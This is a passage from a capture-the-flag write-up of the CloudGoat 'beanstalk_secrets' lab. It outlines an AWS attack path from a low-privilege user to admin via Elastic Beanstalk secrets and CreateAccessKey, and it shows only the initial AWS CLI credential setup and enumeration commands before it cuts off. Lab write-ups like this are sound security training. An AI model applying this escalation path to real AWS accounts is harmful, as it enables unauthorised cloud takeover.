🥷 CloudGoat: Beanstalk Secrets (AWS CLI): Write-up: From low-privilege user to admin (AWS CLI approach)

🥷 CloudGoat: Beanstalk Secrets (AWS CLI) Write-up: From low-privilege user to admin (AWS CLI approach) 🧭 Overview Scenario: beanstalk_secrets \ Platform: CloudGoat (Rhino Security Labs) \ Tools: AWS CLI (no exploitation frameworks) \ Objective: Extract secrets from Elastic Beanstalk, escalate to admin, and retrieve the flag. ⚔️ Attack Path Summary Low-Priv User → Beanstalk Enum → Secondary Creds → IAM Enum → CreateAccessKey → Admin → Flag 🔑 Phase 1: Initial Access Configure Low-Privilege Profile aws configure --profile ebs-1 # Access Key: AKIA**************** # Secret Key: EOyTyXYE/DwNCFAHmFSla5SWz************** Validate Credentials aws sts get-caller-identity --profile ebs-1 { "UserId" : "AIDA****************" , "Account" : "7912********" , "Arn" : "arn:aws:iam::7912********:user/cgid09kivyz0ga_low_priv_user" } 🔎 Phase 2: Elastic Beanstalk Enumeration List Applications aws elasticbeanstalk describe-applications --profile ebs-1 Found: cgid09kivyz0ga-app - "Elastic Beanstalk application